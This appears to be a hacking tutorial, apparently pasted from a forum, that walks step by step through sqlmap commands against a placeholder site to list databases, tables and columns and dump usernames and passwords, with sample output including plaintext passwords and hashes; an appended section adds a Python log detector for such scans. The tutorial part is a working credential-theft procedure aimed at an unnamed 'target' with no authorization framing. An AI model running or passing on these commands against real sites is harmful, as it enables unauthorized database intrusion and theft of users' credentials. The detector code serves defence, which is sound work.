- the first command we are going to use will scan the target for vulnerabilities:
- sqlmap -u "http://www.hackme.com/index.php?id=1" --dbs
- obviously we would replace the URL with our target's URL. sqlmap will now start
- scanning. in some cases it will ask if you want to skip scans to save time;
- we do not want to skip scans, so just type 'n'. it may also ask if you want to include
- certain types of scans; we always want to say 'y'. skipping scans is being lazy, and
- sqlmap might say our target is not vulnerable because we skipped the few scans that
- contained the vulnerability we would exploit. so never skip scans, and always include all scan
- types when asked.
- sqlmap will output our target's database names in a format similar to the one below.
- if the list includes the "information_schema" db then navigating through
- the database should be a breeze. however, if it does not, you will
- end up having to brute-force your way through the database to get table names
- and column names.
- +-------------------+
- |information_schema |
- |database_name |
- |test_db |
- +-------------------+
- sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" --tables
- this command will list the tables of the database you selected. when you select a database you
- do not want to select "information_schema"; most of its data requires "root" to access, or in other
- words you will need to be an admin to read the data.
- +-------------------+
- |products |
- |random_shit |
- |users |
- +-------------------+
- above we have an example of a table list. the primary table we are going to access is the "users"
- table, so we type the following:
- sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" --columns
- this command will list the columns inside the table. the output from sqlmap will look sorta like
- the one below.
- +-------------------+
- |id |
- |user_name |
- |full_name |
- |location |
- |ip_address |
- |last_name |
- |password |
- +-------------------+
- above is an example of what you will see when retrieving the columns.
- the main ones we want to access are the ones that contain the username and password;
- the command to access the data in the columns is below.
- i find it easy to open a few new terminal windows and access the usernames and passwords at the
- same time.
- sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "user_name" --dump
- sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "password" --dump
- now the output will be in the same format as the others, except with usernames:
- +-------------------+
- |admin |
- |user1 |
- |user2 |
- +-------------------+
- and there are 2 outcomes for the password output:
- outcome1:
- +-------------------+
- |admin |
- |irrandom |
- |iamhomo69 |
- +-------------------+
- outcome2:
- +--------------------------------+
- |c02b7d24a066adb747fdeb12deb21bfa|
- |96e79218965eb72c92a549dd5a330112|
- |f1981e4bd8a0d6d8462016d2fc6276b3|
- +--------------------------------+
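For the defending side of the procedure above, an added example that is not from this paste's author: a small Python detector that parses web server access log lines in the Apache/nginx combined format and flags the two server-side signals of a scan like the one walked through here, the tool's default User-Agent and one client sending many distinct values to the same parameter of the same path (which is what probing `index.php?id=` looks like in the logs). The log lines are constructed sample data, and the "sqlmap/1.7" User-Agent string and the threshold of five distinct values are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log (combined format): a normal visitor, one request
# carrying a sqlmap-style User-Agent, and a burst of probes against index.php?id=
# from a host that presents a browser User-Agent.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2023:13:56:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=1%27 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=1%22 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:03 +0000] "GET /index.php?id=1%29 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:03 +0000] "GET /index.php?id=1AbC HTTP/1.1" 200 301 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not combined format (or a truncated line): skip it
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)  # %27 etc. decoded
    return rec

def find_injection_scans(lines, min_distinct=5):
    """Sorted (ip, reason) findings: tool User-Agent, or many values to one parameter."""
    seen_values = defaultdict(set)  # (ip, path, param) -> distinct values seen
    findings = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if "sqlmap" in rec["ua"].lower():
            findings.add((rec["ip"], "sqlmap user-agent"))
        for name, value in rec["params"]:
            seen_values[(rec["ip"], rec["path"], name)].add(value)
    for (ip, path, name), vals in seen_values.items():
        if len(vals) >= min_distinct:
            findings.add((ip, f"{len(vals)} distinct values for {path}?{name}"))
    return sorted(findings)
```

The User-Agent check only catches a scanner that keeps its default string, so the per-parameter value count is the signal worth alerting on.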